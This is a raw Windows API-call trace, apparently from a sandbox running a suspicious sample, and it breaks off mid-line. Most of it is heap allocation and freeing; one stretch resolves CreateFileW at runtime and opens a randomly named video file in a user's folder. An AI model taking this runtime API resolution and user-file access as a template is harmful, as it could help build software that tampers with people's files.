[0103.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0103.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0103.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0103.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0103.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.358] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0103.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0103.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.360] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0103.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0103.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca898, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.360] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0103.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\c1tn0jrrskz9_ 3.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.362] FreeLibrary (hLibModule=0x772d0000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.363] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.363] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.364] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, 